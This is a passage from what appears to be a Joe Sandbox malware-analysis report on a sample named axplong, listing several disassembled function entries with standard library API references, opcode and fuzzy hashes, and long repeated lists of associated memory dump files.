                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cnd_destroy_in_situMtx_destroy_in_situ
                                                                                                                                                                                                                                                    • String ID: @.g
                                                                                                                                                                                                                                                    • API String ID: 1432671424-1460316421
                                                                                                                                                                                                                                                    • Opcode ID: 96462b92bedf419ebee2e3ea8efc78255fc197b1df6362ceaca280f22f5891bd
                                                                                                                                                                                                                                                    • Instruction ID: 997d77f3722fbe7c1f238345534fcb237c3f990b3857cc34f0358970074c1d57
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96462b92bedf419ebee2e3ea8efc78255fc197b1df6362ceaca280f22f5891bd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 23E026B280131466C310BFA09C01E9BBFCE9F12311F40452EF98496302EBB1A52443E5
                                                                                                                                                                                                                                                    Function 006933FC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0069342C
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                    • String ID: pScheduler$version
                                                                                                                                                                                                                                                    • API String ID: 2141394445-3154422776
                                                                                                                                                                                                                                                    • Opcode ID: 04f81e0c0aebee5cee0c09029b5c41af37b4441c2dc8b49a07789cd3e183f03b
                                                                                                                                                                                                                                                    • Instruction ID: 8d75873dc74217863af5a3e538d50c83013e79893d59944e6c54575690685d25
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 04f81e0c0aebee5cee0c09029b5c41af37b4441c2dc8b49a07789cd3e183f03b
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B5E02634440208B6CF11FA54C806FDC73AFDB15748F01C029B4102028287B08B99CA92
                                                                                                                                                                                                                                                    Function 006724A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 006724BE
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: 3a5ce855f84f49be9c2487a787353bbeae83c6db07d9f77e796102555de7cebd
                                                                                                                                                                                                                                                    • Instruction ID: 5a9505a391ddf9bc1ce26d282e79a167be7c37cd771bd9b26d7c89d94101ea1b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3a5ce855f84f49be9c2487a787353bbeae83c6db07d9f77e796102555de7cebd
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 47D012B29203159BD6109F98D801D42BBDDDE16654754852EF544E7300F670E9908FE8
                                                                                                                                                                                                                                                    Function 00672580 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 19COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___std_exception_copy.LIBVCRUNTIME ref: 0067259E
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977372973.00000000008BF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977508510.00000000008C5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977623070.00000000008D3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977767242.00000000008D5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977884387.00000000008D6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978004177.00000000008DA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978117329.00000000008F1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978250820.00000000008F5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978393261.00000000008F6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978498832.00000000008F7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978633657.00000000008F8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978732631.00000000008FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2978862319.00000000008FC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979000956.00000000008FE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979086736.0000000000906000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000908000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979193825.0000000000946000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979487943.0000000000974000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979598507.0000000000976000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979785467.0000000000977000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979832747.000000000097D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2979903922.000000000097F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980027006.000000000098D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2980137595.000000000098E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_5_2_670000_axplong.jbxd
                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: ___std_exception_copy
                                                                                                                                                                                                                                                    • String ID: P#g$P#g
                                                                                                                                                                                                                                                    • API String ID: 2659868963-973111119
                                                                                                                                                                                                                                                    • Opcode ID: b4b9a9cb1550fe865d2554931e6e48a6644c4dc685abe3972a4d9213e41200d4
                                                                                                                                                                                                                                                    • Instruction ID: a6091c4acdaf1db558d12abb9680923bbcd6a46841ae4b88f55afac9d3ad09e6
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b4b9a9cb1550fe865d2554931e6e48a6644c4dc685abe3972a4d9213e41200d4
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6D012B29202159BD6109F99D801D42BBDDDE56654714862AF544E7200F670E9908BE4
                                                                                                                                                                                                                                                    Function 00672E10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 13COMMON
                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • __Mtx_destroy_in_situ.LIBCPMT ref: 00672E1D
                                                                                                                                                                                                                                                    • __Cnd_destroy_in_situ.LIBCPMT ref: 00672E26
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000005.00000002.2969340543.0000000000671000.00000040.00000001.01000000.00000007.sdmp, Offset: 00670000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2968340684.0000000000670000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2969340543.00000000006D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2971382670.00000000006D9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972824055.00000000006DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2972995057.00000000006E5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973272466.00000000006E6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2973451814.00000000006E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974370345.0000000000838000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974514769.000000000083B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.0000000000851000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2974791665.000000000085F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975244048.000000000087A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975426934.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975731806.0000000000890000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2975910248.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976096521.0000000000893000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976314394.0000000000895000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976562636.000000000089D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976747778.00000000008A8000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2976960592.00000000008BD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000005.00000002.2977161488.00000000008BE000.00000040.00000001.01000000.00000007.sdmpDownload File
